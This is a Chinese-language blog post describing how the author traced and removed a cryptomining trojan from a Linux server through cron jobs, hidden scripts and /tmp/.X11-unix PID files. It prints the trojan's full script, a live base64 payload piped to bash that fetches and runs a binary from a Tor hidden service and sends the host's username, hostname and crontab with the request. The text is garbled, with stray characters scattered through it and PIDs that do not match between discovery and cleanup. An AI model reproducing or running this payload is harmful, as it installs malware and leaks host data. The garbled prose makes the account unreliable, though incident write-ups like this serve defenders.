LINUX慘遭挖礦

參考：.systemd-service.sh挖礦木馬排查shanbaobin的博客-CSDN博客.systemd-service.sh渔隶，手動(dòng)記錄

top命令查看進(jìn)程缩举，發(fā)現(xiàn)某不知名進(jìn)程占滿cpu平委，導(dǎo)致我很多服務(wù)不可用

top命令查看

crontab -l

發(fā)現(xiàn)有個(gè)可疑腳本：/root/.systemd-service.sh

查看一下：

[root@10-9-181-78 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo xeVBa2qNgxz++OO5fCAs7pMTNuXLyOMOvGt6Fhni+jH66NppNT+F7aWttcCLjX9x
echo eGVWQmEycU5neHorK09PNWZDQXM3cE1UTnVYTHlPTU92R3Q2RmhuaStqSDY2TnBwTlQrRjdhV3R0Y0NMalg5eApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJtaGV2a2s0b2RnenFwdDJoYmozaGh3MnV6NHZodW5vbzU1ZXZld3JnbW91eWllaGNhbHRtYnJxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash

很明顯是被加密過，通過base64解密啥繁，獲得如下：

解碼后

發(fā)現(xiàn)可疑文件/tmp/.X11-unix/01荒叶，查看/tmp/.X11-unix目錄下文件內(nèi)容

/tmp/.X11-unix

從內(nèi)容上看是該進(jìn)程的兩個(gè)進(jìn)程ID，ps -ef|grep查看對(duì)應(yīng)進(jìn)程：

查看進(jìn)程號(hào)

查看/etc/hosts文件是否正常输虱，我這里是沒有問題

來到/etc/cron.d/目錄下發(fā)現(xiàn)可疑文件

/etc/cron.d/0systemd-service內(nèi)容

這個(gè)指令指向/opt/目錄下的systemd-service.sh，繼續(xù)追蹤：

依舊是加密過的

解密：

沒啥新鮮的內(nèi)容

至此：我們找到了

2個(gè)可疑定時(shí)任務(wù)分布在：crontab脂凶、/etc/cron.d/0systemd-service

2個(gè)可疑文件分布在：/root/.systemd-service.sh宪睹、/opt/systemd-service.sh

2個(gè)可疑進(jìn)程PID：9332、21602

針對(duì)上邊的問題進(jìn)行處理：

1. 清空.ssh/known_hosts里面可疑的公鑰
2. 清理crontab蚕钦、刪除/etc/cron.d/0systemd-service
3. 刪除/root/.systemd-service.sh亭病、/opt/systemd-service.sh
4. 殺掉2784024、3234955

注意：遇到這種挖礦木馬一定要徹底清理干凈嘶居，否則它就像小強(qiáng)一樣打不死罪帖。之前我只是單純的刪除了定時(shí)任務(wù)和腳本，沒有看腳本里面的內(nèi)容邮屁，導(dǎo)致頻頻復(fù)發(fā)整袁，最后定位到/tmp/.X11-unix/這個(gè)目錄才找到幕后進(jìn)程。一般被植入這種挖礦木馬主要因?yàn)槭悄承┞┒磫栴}佑吝，比如你安裝了redis然后使用redis默認(rèn)配置坐昙，沒有設(shè)置密碼，開放了6379端口芋忿，而你的redis中又有遠(yuǎn)程代碼執(zhí)行的漏洞炸客，那么很容易中招。

我已處理完戈钢，過段時(shí)間看效果痹仙。

經(jīng)過一夜，驗(yàn)證此法有效殉了。